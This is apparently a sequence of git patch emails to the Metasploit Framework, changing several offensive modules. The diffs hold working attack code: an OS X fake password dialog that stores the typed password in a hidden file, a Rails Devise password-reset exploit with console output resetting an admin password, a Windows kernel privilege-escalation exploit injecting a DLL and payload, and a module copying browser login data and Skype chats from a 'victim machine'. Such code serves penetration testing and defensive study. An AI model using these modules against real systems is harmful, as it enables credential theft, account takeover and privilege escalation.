     lines = data.lines.select { |line| line =~ /desc|srvr|ptcl/ }.map(&:strip)
 
     # Go through the list, find the saved Network Password descriptions
@@ -146,15 +149,14 @@ class Metasploit3 < Msf::Post
   # @return [Array<String>] sorted list of volumes saved in the user's "Recent Shares"
   def get_favorite_shares(sidebar_plist_path)
     # Grep for URL
-    data = cmd_exec("defaults read #{sidebar_plist_path.shellescape} favoriteservers")
-    list = data.lines.map(&:strip).map { |line| line =~ /^URL = \"(.*)\"\;$/; $1 }.compact
+    data = cmd_exec("defaults read #{sidebar_plist_path} favoriteservers")
+    list = data.lines.map(&:strip).map { |line| line =~ /^URL = \"(.*)\"\;$/ && $1 }.compact
 
     # Grep for EntryType and Name
-    data = cmd_exec("defaults read #{sidebar_plist_path.shellescape} favorites")
+    data = cmd_exec("defaults read #{sidebar_plist_path} favorites")
     lines = data.lines.map(&:strip).select { |line| line =~ /EntryType|Name/ }
 
-    # Go through the list, find the rows with EntryType 8 and their
-    # corresponding name
+    # Go through the list, find the rows with EntryType 8 and their corresponding name
     lines.each_with_index do |line, x|
       if line =~ /EntryType = 8;/ && x < lines.length-1
         if NAME_REGEXES.any? { |r| lines[x+1].strip =~ r }
@@ -170,8 +172,8 @@ class Metasploit3 < Msf::Post
   # @return [Array<String>] sorted list of volumes saved in the user's "Recent Shares"
   def get_recent_shares(recent_plist_path)
     # Grep for Name
-    data = cmd_exec("defaults read #{recent_plist_path.shellescape} RecentServers")
-    data.lines.map(&:strip).select { |line| if NAME_REGEXES.any? { |r| line.strip =~ r } then $1 end }.compact.uniq.sort
+    data = cmd_exec("defaults read #{recent_plist_path} Hosts")
+    data.lines.map(&:strip).map { |line| line =~ /^URL = \"(.*)\"\;$/ && $1 }.compact.uniq.sort
   end
 
   # @return [Array<String>] sorted list of mounted volume names
@@ -183,13 +185,13 @@ class Metasploit3 < Msf::Post
     share_name = datastore['VOLUME']
     protocol = datastore['PROTOCOL']
     print_status("Connecting to #{protocol}://#{share_name}")
-    cmd_exec("#{osascript_path.shellescape} -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'")
+    cmd_exec("#{osascript_path} -e 'tell app \"finder\" to mount volume \"#{protocol}://#{share_name}\"'")
   end
 
   def unmount
     share_name = datastore['VOLUME']
     print_status("Disconnecting from #{share_name}")
-    cmd_exec("#{osascript_path.shellescape} -e 'tell app \"finder\" to eject \"#{share_name}\"'")
+    cmd_exec("#{osascript_path} -e 'tell app \"finder\" to eject \"#{share_name}\"'")
   end
 
   # hook cmd_exec to print a debug message when DEBUG=true
@@ -198,6 +200,16 @@ class Metasploit3 < Msf::Post
     super
   end
 
+  # Prints a file share url (e.g. smb://joe.com) as Protocol + \t + Host
+  # @param [String] line the URL to parse and print formatted
+  def print_uri(line)
+    if line =~ /^(.*?):\/\/(.*)$/
+      print_good "  #{$1}\t#{$2}"
+    else
+      print_good "  #{line}"
+    end
+  end
+
   # path to osascript on the remote system
-  def osascript_path; datastore['OSASCRIPT_PATH']; end
+  def osascript_path; datastore['OSASCRIPT_PATH'].shellescape; end
 end

From 6561f149a8221ff23d3ed35fe68ae8d2e0dcefcc Mon Sep 17 00:00:00 2001
From: joev <joev@metasploit.com>
Date: Wed, 27 Nov 2013 06:16:25 -0600
Subject: [PATCH 114/217] DRY up URL_REGEX constant.

---
 modules/post/osx/manage/mount_share.rb | 9 +++++++--
 1 file changed, 7 insertions(+), 2 deletions(-)

diff --git a/modules/post/osx/manage/mount_share.rb b/modules/post/osx/manage/mount_share.rb
index 09391d0cfb..be6d5b1701 100644
--- a/modules/post/osx/manage/mount_share.rb
+++ b/modules/post/osx/manage/mount_share.rb
@@ -8,10 +8,15 @@ require 'rex'
 
 class Metasploit3 < Msf::Post
 
+  # list of accepted file share protocols. other "special" URLs (like vnc://) will be ignored.
   FILE_SHARE_PROTOCOLS = %w(smb nfs cifs ftp afp)
 
+  # Used to parse a name property from a plist
   NAME_REGEXES = [/^Name \= \"(.*)\"\;$/, /^Name \= (.*)\;$/]
 
+  # Used to parse a URL property from a plist
+  URL_REGEX = /^URL = \"(.*)\"\;$/
+
   include Msf::Post::File
 
   def initialize(info={})
@@ -150,7 +155,7 @@ class Metasploit3 < Msf::Post
   def get_favorite_shares(sidebar_plist_path)
     # Grep for URL
     data = cmd_exec("defaults read #{sidebar_plist_path} favoriteservers")
-    list = data.lines.map(&:strip).map { |line| line =~ /^URL = \"(.*)\"\;$/ && $1 }.compact
+    list = data.lines.map(&:strip).map { |line| line =~ URL_REGEX && $1 }.compact
 
     # Grep for EntryType and Name
     data = cmd_exec("defaults read #{sidebar_plist_path} favorites")
@@ -173,7 +178,7 @@ class Metasploit3 < Msf::Post
   def get_recent_shares(recent_plist_path)
     # Grep for Name
     data = cmd_exec("defaults read #{recent_plist_path} Hosts")
-    data.lines.map(&:strip).map { |line| line =~ /^URL = \"(.*)\"\;$/ && $1 }.compact.uniq.sort
+    data.lines.map(&:strip).map { |line| line =~ URL_REGEX && $1 }.compact.uniq.sort
   end
 
   # @return [Array<String>] sorted list of mounted volume names

From a32c9e5efcb8abd03f21a3ca41c41a3493c8c782 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 27 Nov 2013 11:19:46 -0600
Subject: [PATCH 115/217] Fix fail_with on Exploit::Remote::HttpClient

---
 lib/msf/core/exploit/http/client.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index 793c5c34e1..d614d35fd3 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -126,7 +126,7 @@ module Exploit::Remote::HttpClient
         opts[:pattern].each do |re|
           if not re.match(info)
             err = "The target server fingerprint \"#{info}\" does not match \"#{re.to_s}\", use 'set FingerprintCheck false' to disable this check."
-            fail_with(Failure::NotFound, err)
+            fail_with(::Msf::Module::Failure::NotFound, err)
           end
         end
       end

From a5aca618e28219b0671d70d93798b4349d6f9076 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 27 Nov 2013 11:33:19 -0600
Subject: [PATCH 116/217] fix fail_with usage on Exploit::Remote::MSSQL_SQLI

---
 lib/msf/core/exploit/mssql_sqli.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/mssql_sqli.rb b/lib/msf/core/exploit/mssql_sqli.rb
index 415da84c67..2c456b01f3 100644
--- a/lib/msf/core/exploit/mssql_sqli.rb
+++ b/lib/msf/core/exploit/mssql_sqli.rb
@@ -144,7 +144,7 @@ module Exploit::Remote::MSSQL_SQLI
     if (datastore['METHOD'] == 'GET')
 
       unless datastore['GET_PATH'].index("[SQLi]")
-        fail_with(Failure::NoTarget, "The SQL injection parameter was not specified in the GET path")
+        fail_with(::Msf::Module::Failure::NoTarget, "The SQL injection parameter was not specified in the GET path")
       end
 
       uri = datastore['GET_PATH'].gsub("[SQLi]", Rex::Text.uri_encode(sqla))
@@ -160,7 +160,7 @@ module Exploit::Remote::MSSQL_SQLI
     else
 
       unless datastore['DATA'].index("[SQLi]")
-        fail_with(Failure::NoTarget, "The SQL injection parameter was not specified in the POST data")
+        fail_with(::Msf::Module::Failure::NoTarget, "The SQL injection parameter was not specified in the POST data")
       end
 
       post_data = datastore['DATA'].gsub("[SQLi]", Rex::Text.uri_encode(sqla))

From 95a98529c4cacc38e2488eb9e74e021786d12b79 Mon Sep 17 00:00:00 2001
From: Peter Toth <peter.toth@sucaba.eu>
Date: Wed, 27 Nov 2013 21:38:20 +0100
Subject: [PATCH 117/217] Removed script launcher wrapper and fixed the
 file_exists so that the module now detects input

---
 .../post/osx/gather/password_prompt_spoof.rb  | 86 ++++++++-----------
 1 file changed, 34 insertions(+), 52 deletions(-)

diff --git a/modules/post/osx/gather/password_prompt_spoof.rb b/modules/post/osx/gather/password_prompt_spoof.rb
index 21d2579b9a..7bfa70ee95 100644
--- a/modules/post/osx/gather/password_prompt_spoof.rb
+++ b/modules/post/osx/gather/password_prompt_spoof.rb
@@ -19,7 +19,8 @@ class Metasploit3 < Msf::Post
         'License'       => MSF_LICENSE,
         'Author'        => [
           'Joff Thyer <jsthyer[at]gmail.com>', # original post module
-          'joev' # bug fixes
+          'joev', # bug fixes
+          'Peter Toth <globetother[at]gmail.com>' # bug fixes
         ],
         'Platform'      => [ 'osx' ],
         'References'    => [
@@ -79,29 +80,23 @@ class Metasploit3 < Msf::Post
     print_status("Running module against #{host}")
 
     dir       = "/tmp/." + Rex::Text.rand_text_alpha((rand(8)+6))
-    runme     = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
     creds_osa = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
-    creds     = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
     pass_file = dir + "/" + Rex::Text.rand_text_alpha((rand(8)+6))
 
     username = cmd_exec("/usr/bin/whoami").strip
     cmd_exec("umask 0077")
     cmd_exec("/bin/mkdir #{dir}")
 
-    # write the script that will launch things
-    write_file(runme, run_script)
-    cmd_exec("/bin/chmod 700 #{runme}")
-
-    # write the credentials script, compile and run
+    # write the credentials script and run
     write_file(creds_osa,creds_script(pass_file))
-    cmd_exec("/usr/bin/osacompile -o #{creds} #{creds_osa}")
-    cmd_exec("#{runme} #{creds}")
+    cmd_exec("cat #{creds_osa} | osascript")
+
     print_status("Waiting for user '#{username}' to enter credentials...")
 
     timeout = ::Time.now.to_f + datastore['TIMEOUT'].to_i
     pass_found = false
     while (::Time.now.to_f < timeout)
-      if ::File.exist?(pass_file)
+      if file_exist?(pass_file)
         print_status("Password entered! What a nice compliant user...")
         pass_found = true
         break
@@ -122,51 +117,38 @@ class Metasploit3 < Msf::Post
     cmd_exec("/usr/bin/srm -rf #{dir}")
   end
 
-  # "wraps" the #creds_script applescript and allows it to make UI calls
-  def run_script
-    %Q{
-      #!/bin/bash
-      osascript <<EOF
-      set scriptfile to "$1"
-      tell application "AppleScript Runner"
-        do script scriptfile
-      end tell
-      EOF
-    }
-  end
-
   # applescript that displays the actual password prompt dialog
   def creds_script(pass_file)
     textcreds = datastore['TEXTCREDS']
     ascript = %Q{
-      set filename to "#{pass_file}"
-      set myprompt to "#{textcreds}"
-      set ans to "Cancel"
-      repeat
-        try
-          tell application "Finder"
-            activate
-            tell application "System Events" to keystroke "h" using {command down, option down}
-            set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "#{datastore['ICONFILE']}" in bundle "#{datastore['BUNDLEPATH']}"
-            set ans to button returned of d_returns
-            set mypass to text returned of d_returns
-            if ans is equal to "OK" and mypass is not equal to "" then exit repeat
-          end tell
-        end try
-      end repeat
-      try
-        set now to do shell script "date '+%Y%m%d_%H%M%S'"
-          set user to do shell script "whoami"
-        set myfile to open for access filename with write permission
-        set outstr to now & ":" & user & ":" & mypass & "
-      "
-        write outstr to myfile starting at eof
-        close access myfile
-      on error
-        try
-          close access myfile
-        end try
-      end try
+set filename to "#{pass_file}"
+set myprompt to "#{textcreds}"
+set ans to "Cancel"
+repeat
+  try
+    tell application "Finder"
+      activate
+      tell application "System Events" to keystroke "h" using {command down, option down}
+      set d_returns to display dialog myprompt default answer "" with hidden answer buttons {"Cancel", "OK"} default button "OK" with icon path to resource "#{datastore['ICONFILE']}" in bundle "#{datastore['BUNDLEPATH']}"
+      set ans to button returned of d_returns
+      set mypass to text returned of d_returns
+      if ans is equal to "OK" and mypass is not equal to "" then exit repeat
+    end tell
+  end try
+end repeat
+try
+  set now to do shell script "date '+%Y%m%d_%H%M%S'"
+    set user to do shell script "whoami"
+  set myfile to open for access filename with write permission
+  set outstr to now & ":" & user & ":" & mypass & "
+"
+  write outstr to myfile starting at eof
+  close access myfile
+on error
+  try
+    close access myfile
+  end try
+end try
     }
   end
 

From 036cd8c5ad636310ed5641df104c3e316d0dc520 Mon Sep 17 00:00:00 2001
From: Joshua Harper <josh@radixtx.com>
Date: Wed, 27 Nov 2013 14:44:39 -0600
Subject: [PATCH 118/217] couple cosmetic changes per wvu-r7

---
 .../post/windows/gather/forensics/gather_browser_history.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index a801dcd48a..c083492f31 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -19,9 +19,11 @@ class Metasploit3 < Msf::Post
   def initialize(info={})
     super( update_info( info,
         'Name' => 'Windows Gather Skype, Firefox, and Chrome Artifacts',
-        'Description' => %q{Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.},
+        'Description' => %q{
+          Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.
+        },
         'License' => MSF_LICENSE,
-        'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>'],
+        'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>' ],
         'Platform' => %w{ win },
         'SessionTypes' => [ 'meterpreter' ]
       ))

From 1c17383effa20d1857311543625d5ee504f793a8 Mon Sep 17 00:00:00 2001
From: Joshua Harper <josh@radixtx.com>
Date: Wed, 27 Nov 2013 15:04:31 -0600
Subject: [PATCH 119/217] removed return file_loc removed extra space

---
 .../post/windows/gather/forensics/gather_browser_history.rb    | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index c083492f31..790064dbbb 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -143,14 +143,13 @@ class Metasploit3 < Msf::Post
   def download_artifact(opts={})
     file = session.fs.file.search("#{opts[:profile]["#{opts[:path]}"]}\\#{opts[:artifact_dir]}","#{opts[:artifact_filename]}",true)
     file.each do |db|
-      guid = db['path'].split ('\\')
+      guid = db['path'].split('\\')
       # Using store_local for full control of output filename.  Forensics software can be picky about the files it's given.
       file_loc = store_local("artifact","#{opts[:artifact_filetype]}",session,"#{opts[:profile]['UserName']}_#{opts[:artifact_name]}_#{guid.last}_#{opts[:artifact_filename]}")
       maindb = "#{db['path']}#{session.fs.file.separator}#{db['name']}"
       print_status("Downloading #{maindb}")
       session.fs.file.download_file(file_loc,maindb)
       print_good("#{opts[:artifact_name]} artifact file saved to #{file_loc}")
-      return file_loc
     end
   end
 end

From 7f8baf979d1bfa28b4da3686fa5466a0aa84235a Mon Sep 17 00:00:00 2001
From: Jeff Jarmoc <jeff@matasano.com>
Date: Wed, 27 Nov 2013 15:35:43 -0600
Subject: [PATCH 120/217] Adds the ability to configure object name in URI and
 XML.  This allows exploiting other platforms that include devise.

For example, activeadmin is exploitable if running a vulnerable devise and rails version with the following settings;
msf > use auxiliary/admin/http/rails_devise_pass_reset
msf auxiliary(rails_devise_pass_reset) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf auxiliary(rails_devise_pass_reset) > set RPORT 3000
RPORT => 3000
msf auxiliary(rails_devise_pass_reset) > set TARGETEMAIL admin@example.com
TARGETEMAIL => admin@example.com
msf auxiliary(rails_devise_pass_reset) > set TARGETURI /admin/password
TARGETURI => /admin/password
msf auxiliary(rails_devise_pass_reset) > set PASSWORD msf_pwnd
PASSWORD => msf_pwnd
msf auxiliary(rails_devise_pass_reset) > set OBJECTNAME admin_user
OBJECTNAME => admin_user
msf auxiliary(rails_devise_pass_reset) > exploit

[*] Clearing existing tokens...
[*] Generating reset token for admin@example.com...
[+] Reset token generated successfully
[*] Resetting password to "msf_pwnd"...
[+] Password reset worked successfully
[*] Auxiliary module execution completed
msf auxiliary(rails_devise_pass_reset) >
---
 modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
index b2a8f03966..9dae3abeb4 100644
--- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
+++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb
@@ -52,6 +52,7 @@ class Metasploit3 < Msf::Auxiliary
       [
         OptString.new('TARGETURI', [ true,  'The request URI', '/users/password']),
         OptString.new('TARGETEMAIL', [true, 'The email address of target account']),
+        OptString.new('OBJECTNAME', [true, 'The user object name', 'user']),
         OptString.new('PASSWORD', [true, 'The password to set']),
         OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
         OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10])
@@ -61,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
   def generate_token(account)
     # CSRF token from GET "/users/password/new" isn't actually validated it seems.
 
-    postdata="user[email]=#{account}"
+    postdata="#{datastore['OBJECTNAME']}[email]=#{account}"
 
     res = send_request_cgi({
       'uri'     => normalize_uri(datastore['TARGETURI']),
@@ -100,11 +101,11 @@ class Metasploit3 < Msf::Auxiliary
       encode_pass = REXML::Text.new(password).to_s
 
       xml = ""
-      xml << "<user>"
+      xml << "<#{datastore['OBJECTNAME']}>"
       xml << "<password>#{encode_pass}</password>"
       xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
       xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
-      xml << "</user>"
+      xml << "</#{datastore['OBJECTNAME']}>"
 
       res = send_request_cgi({
           'uri'     => normalize_uri(datastore['TARGETURI']),

From 0b879d8f39d9a54b131ea741d6b705079d118089 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 28 Nov 2013 08:42:16 +1000
Subject: [PATCH 121/217] Comments for WfsDelay, adjustment to injection

I had inteded to add the `WfsDelay` as Meatballs suggested, but for locl
exploits this doesn't appear to work as expected. After speaking to HDM
we've decided to leave the sleep in there and figure out the `WsfDelay`
thing later.

This also includes a slight refactor which puts the payload and the
exploit in the same chunk of allocated memory. Minor optimisation, but
worth it.
---
 .../exploits/windows/local/ppr_flatten_rec.rb | 34 +++++++++++--------
 1 file changed, 19 insertions(+), 15 deletions(-)

diff --git a/modules/exploits/windows/local/ppr_flatten_rec.rb b/modules/exploits/windows/local/ppr_flatten_rec.rb
index 41a33cc523..980d9b856c 100644
--- a/modules/exploits/windows/local/ppr_flatten_rec.rb
+++ b/modules/exploits/windows/local/ppr_flatten_rec.rb
@@ -59,9 +59,14 @@ class Metasploit3 < Msf::Exploit::Local
           [ 'URL', 'http://seclists.org/fulldisclosure/2013/May/91' ],
         ],
       'DisclosureDate' => 'May 15 2013',
-      'DefaultTarget'  => 0
+      'DefaultTarget'  => 0,
+      # TODO: Uncomment this line and remove the Rex.sleep when WsfDelay works properly.
+      # Wait for up to 30 seconds by default for our shell because this exploit can
+      # take quite a while to finish execute
+      #'DefaultOptions' => { 'WfsDelay' => 30 }
     }))
 
+    # TODO: remove this when we've sorted out the WsfDelay issue.
     register_options([
       OptInt.new('WAIT', [ true, "Number of seconds to wait for exploit to run", 10 ])
     ], self.class)
@@ -141,7 +146,6 @@ class Metasploit3 < Msf::Exploit::Local
     host_process = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
     print_good("Process #{pid} launched.")
 
-    print_status("Reflectively injecting the exploit DLL into #{pid}...")
     library_path = ::File.join(Msf::Config.data_directory, "exploits",
                                "cve-2013-3660", "ppr_flatten_rec.x86.dll")
     library_path = ::File.expand_path(library_path)
@@ -153,36 +157,36 @@ class Metasploit3 < Msf::Exploit::Local
         break
       end
     end
-    # Inject the exloit, but don't run it yet.
-    exploit_mem = inject_into_pid(dll, host_process)
 
-    print_status("Exploit injected. Injecting payload into #{pid}...")
-    # Inject the payload into the process so that it's runnable by the exploit.
-    payload_mem = inject_into_pid(payload.encoded, host_process)
+    print_status("Injecting exploit and payload into #{pid}...")
+    # Inject the exploit and payload, but don't run it yet.
+    exploit_mem, payload_mem = inject_into_pid(dll, payload.encoded, host_process)
+
+    print_status("Injection complete. Executing exploit...")
 
-    print_status("Payload injected. Executing exploit...")
     # invoke the exploit, passing in the address of the payload that
     # we want invoked on successful exploitation.
     host_process.thread.create(exploit_mem + offset, payload_mem)
 
+    # TODO: remove this Rex.sleep call when the WsfDelay stuff works correctly for local
+    # exploits. For some reason it doesn't appear to work properly.
     wait = datastore['WAIT'].to_i
     print_status("Exploit thread executing (can take a while to run), waiting #{wait} sec ...")
-    # TODO: talk to the guys about this, there has to be a wait involved before the
-    # exploit has finished, because the listener has to stick around for a while
-    # otherwise it shuts down before the exploit has finished.
     Rex.sleep(wait)
+
     print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
   end
 
 protected
 
-  def inject_into_pid(payload, process)
-    payload_size = payload.length
+  def inject_into_pid(exploit, payload, process)
+    payload_size = exploit.length + payload.length
     payload_size += 1024 - (payload.length % 1024) unless payload.length % 1024 == 0
     payload_mem = process.memory.allocate(payload_size)
     process.memory.protect(payload_mem)
-    process.memory.write(payload_mem, payload)
-    return payload_mem
+    process.memory.write(payload_mem, exploit)
+    process.memory.write(payload_mem + exploit.length, payload)
+    return payload_mem, payload_mem + exploit.length
   end
 
 end

From a8af050c16cb9b279c50e4dba713542bc5e36033 Mon Sep 17 00:00:00 2001
From: sinn3r <wei_chen@rapid7.com>
Date: Wed, 27 Nov 2013 19:21:27 -0600
Subject: [PATCH 122/217] Update post module Apache Tomcat description

This module's description needs to be more descriptive, otherwise
you kind of have to pull the source code to see what it actually
does for you.
---
 modules/post/windows/gather/enum_tomcat.rb | 8 ++++++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/enum_tomcat.rb b/modules/post/windows/gather/enum_tomcat.rb
index 6c90522b76..7d568a0aa2 100644
--- a/modules/post/windows/gather/enum_tomcat.rb
+++ b/modules/post/windows/gather/enum_tomcat.rb
@@ -16,8 +16,12 @@ class Metasploit3 < Msf::Post
 
   def initialize(info={})
     super( update_info( info,
-      'Name'          => 'Windows Gather Tomcat Server Enumeration',
-      'Description'   => %q{ This module will enumerate a windows system for tomcat servers},
+      'Name'          => 'Windows Gather Apache Tomcat Enumeration',
+      'Description'   => %q{
+        This module will collect information from a Windows-based Apache Tomcat. You will get
+        information such as: The installation path, Tomcat version, port, web applications,
+        users, passwords, roles, etc.
+      },
       'License'       => MSF_LICENSE,
       'Author'        => [
         'Barry Shteiman <barry[at]sectorix.com>', # Module author

From 0c59c885c4b3802c4e150709b7029087318d3388 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 28 Nov 2013 11:48:11 +1000
Subject: [PATCH 123/217] Fix metsrv.dll name issue

As mentioned here https://community.rapid7.com/thread/3788 the metsvc
script was still looking for the old file name for metsrv.dll, which
was causing the script to fail.

This commit fixes this issue. A hash is used to indicate local and remote
file names so that the remote can continue to use metsrv.dll, but it
is correctly located on disk locally.
---
 scripts/meterpreter/metsvc.rb | 20 +++++++++++++++-----
 1 file changed, 15 insertions(+), 5 deletions(-)

diff --git a/scripts/meterpreter/metsvc.rb b/scripts/meterpreter/metsvc.rb
index 8ed0b7d542..1e668389e2 100644
--- a/scripts/meterpreter/metsvc.rb
+++ b/scripts/meterpreter/metsvc.rb
@@ -70,11 +70,21 @@ if client.platform =~ /win32|win64/
   print_status("Creating a temporary installation directory #{tempdir}...")
   client.fs.dir.mkdir(tempdir)
 
-  %W{ metsrv.dll metsvc-server.exe metsvc.exe }.each do |bin|
-    next if (bin != "metsvc.exe" and remove)
-    print_status(" >> Uploading #{bin}...")
-    fd = client.fs.file.new(tempdir + "\\" + bin, "wb")
-    fd.write(::File.read(File.join(based, bin), ::File.size(::File.join(based, bin))))
+  # Use an array of `from -> to` associations so that things
+  # such as metsrv can be copied from the appropriate location
+  # but named correctly on the target.
+  bins = {
+    'metsrv.x86.dll'    => 'metsrv.dll',
+    'metsvc-server.exe' => nil,
+    'metsvc.exe'        => nil
+  }
+
+  bins.each do |from, to|
+    next if (from != "metsvc.exe" and remove)
+    to ||= from
+    print_status(" >> Uploading #{from}...")
+    fd = client.fs.file.new(tempdir + "\\" + to, "wb")
+    fd.write(::File.read(File.join(based, from), ::File.size(::File.join(based, from))))
     fd.close
   end
 

From cdf6ffa70d3cecbf41d7100ee376b3ebef0822ad Mon Sep 17 00:00:00 2001
From: Joshua Harper <josh@radixtx.com>
Date: Wed, 27 Nov 2013 21:02:48 -0600
Subject: [PATCH 124/217] Complete refactor with lots of help from @kernelsmith
 and @OJ.  Thank you guys so much.

---
 .../forensics/gather_browser_history.rb       | 168 ++++++------------
 1 file changed, 57 insertions(+), 111 deletions(-)

diff --git a/modules/post/windows/gather/forensics/gather_browser_history.rb b/modules/post/windows/gather/forensics/gather_browser_history.rb
index 790064dbbb..3f9dbbc587 100644
--- a/modules/post/windows/gather/forensics/gather_browser_history.rb
+++ b/modules/post/windows/gather/forensics/gather_browser_history.rb
@@ -16,11 +16,13 @@ class Metasploit3 < Msf::Post
   include Msf::Post::Windows::UserProfiles
   include Msf::Post::Windows::Registry
 
+  STORE_FILE_TYPE = 'binary/db'
+
   def initialize(info={})
     super( update_info( info,
         'Name' => 'Windows Gather Skype, Firefox, and Chrome Artifacts',
         'Description' => %q{
-          Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.
+Gathers Skype chat logs, Firefox history, and Chrome history data from the victim machine.
         },
         'License' => MSF_LICENSE,
         'Author' => [ 'Joshua Harper (@JonValt) <josh at radixtx dot com>' ],
@@ -29,127 +31,71 @@ class Metasploit3 < Msf::Post
       ))
   end
 
+  #
+  # Execute the module.
+  #
   def run
     print_status("Gathering user profiles")
+
+    files_to_gather = [
+      { :path => 'LocalAppData', :name => "Chrome History", :dir => "Google", :fname => "History." },
+      { :path => 'LocalAppData', :name => "Chrome History", :dir => "Google", :fname => "Login Data." },
+      { :path => 'LocalAppData', :name => "Chrome History", :dir => "Google", :fname => "Archived History." },
+      { :path => 'LocalAppData', :name => "Chrome History", :dir => "Google", :fname => "Bookmarks." },
+      { :path => 'AppData', :name => 'skype', :dir => 'Skype', :fname => "main.db" },
+      { :path => 'AppData', :name => "Firefox", :dir => "Mozilla", :fname => "places.sqlite" }
+    ]
+
     grab_user_profiles.each do |userprofile|
-      if check_artifact({
-            :path=>userprofile['AppData'],
-            :user=>userprofile['UserName'],
-            :artifact_name=>"skype",
-            :artifact_dir=>"Skype"
-          })
-        download_artifact({
-            :path=>"AppData",
-            :profile=>userprofile,
-            :artifact_name=>"skype",
-            :artifact_dir=>"Skype",
-            :artifact_filename=>"main.db",
-            :artifact_filetype=>"binary/db"
-          })
-      end
-      if check_artifact({
-            :path=>userprofile['AppData'],
-            :user=>userprofile['UserName'],
-            :artifact_name=>"Firefox",
-            :artifact_dir=>"Mozilla"
-          })
-        download_artifact({:path=>"AppData",
-            :profile=>userprofile,
-            :artifact_name=>"Firefox",
-            :artifact_dir=>"Mozilla",
-            :artifact_filename=>"places.sqlite",
-            :artifact_filetype=>"binary/db"
-          })
-      end
-      if check_artifact({
-            :path=>userprofile['LocalAppData'],
-            :user=>userprofile['UserName'],
-            :artifact_name=>"Chrome History",
-            :artifact_dir=>"Google"
-          })
-        download_artifact({
-            :path=>"LocalAppData",
-            :profile=>userprofile,
-            :artifact_name=>"Chrome_History",
-            :artifact_dir=>"Google",
-            :artifact_filename=>"History.",
-            :artifact_filetype=>"binary/db"
-          })
-      end
-      if check_artifact({
-            :path=>userprofile['LocalAppData'],
-            :user=>userprofile['UserName'],
-            :artifact_name=>"Chrome History",
-            :artifact_dir=>"Google"
-          })
-        download_artifact({
-            :path=>"LocalAppData",
-            :profile=>userprofile,
-            :artifact_name=>"Chrome_History",
-            :artifact_dir=>"Google",
-            :artifact_filename=>"Login Data.",
-            :artifact_filetype=>"binary/db"
-          })
-      end
-      if check_artifact({
-            :path=>userprofile['LocalAppData'],
-            :user=>userprofile['UserName'],
-            :artifact_name=>"Chrome History",
-            :artifact_dir=>"Google"
-          })
-        download_artifact({
-            :path=>"LocalAppData",
-            :profile=>userprofile,
-            :artifact_name=>"Chrome_History",
-            :artifact_dir=>"Google",
-            :artifact_filename=>"Archived History.",
-            :artifact_filetype=>"binary/db"
-          })
-      end
-      if check_artifact({
-            :path=>userprofile['LocalAppData'],
-            :user=>userprofile['UserName'],
-            :artifact_name=>"Chrome History",
-            :artifact_dir=>"Google"
-          })
-        download_artifact({
-            :path=>"LocalAppData",
-            :profile=>userprofile,
-            :artifact_name=>"Chrome_History",
-            :artifact_dir=>"Google",
-            :artifact_filename=>"Bookmarks.",
-            :artifact_filetype=>"binary/db"
-          })
-      end
+      files_to_gather.each { |f| download_artifact(userprofile, f) }
     end
   end
 
-  def check_artifact(opts={})
-    print_status("Checking for #{opts[:artifact_name]} artifacts...")
-    dirs = []
-    session.fs.dir.foreach(opts[:path]) do |d|
-      dirs << d
-    end
-    dirs.each do |dir|
-      if dir == opts[:artifact_dir]
-        print_good("#{opts[:artifact_name]} directory found for #{opts[:user]}")
-        return true
-      end
-    end
-    print_good("#{opts[:artifact_name]} directory not found for #{opts[:user]}")
-    return false
+  #
+  # Check to see if the artifact exists on the remote system.
+  #
+  def check_artifact(profile, opts={})
+    path = profile[opts[:path]]
+    dir = opts[:dir]
+
+    dirs = session.fs.dir.foreach(path).collect
+
+    return dirs.include? dir
   end
 
-  def download_artifact(opts={})
-    file = session.fs.file.search("#{opts[:profile]["#{opts[:path]}"]}\\#{opts[:artifact_dir]}","#{opts[:artifact_filename]}",true)
+  #
